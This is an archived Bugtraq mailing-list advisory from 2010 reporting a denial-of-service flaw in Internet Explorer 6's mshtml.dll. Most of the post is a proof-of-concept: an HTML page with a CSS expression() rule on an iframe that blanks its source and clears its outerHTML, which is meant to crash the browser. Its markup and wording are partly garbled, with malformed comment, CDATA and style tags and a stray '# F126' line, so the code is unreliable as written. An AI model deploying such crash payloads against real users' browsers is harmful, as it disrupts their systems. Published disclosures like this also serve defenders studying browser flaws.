Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

IE6 css set Denial of Service Vulnerability

From: info () securitylab ir
Date: Mon, 12 Jul 2010 07:07:44 -0600
Published by Securitylab.ir
Founder: unknown

<style type="text/css">
<! -
The question is which set the css style of the time wrong.
css definition is f: expression (this.src = 'about: blank', this.outerHTML ='');
In question should be is mshtml.dll ->
/*<![ CDATA [*/
iframe{
f: expression(this.src='about:blank',this.outerHTML='');
}
# F126 (v: expression ()! Important)
/*]]>*/
</ Style>
<iframe id=f126 src=test>

Original Advisory:
http://securitylab.ir/other/IE-1.txt
Previous By Date Next
Previous By Thread Next

Current thread: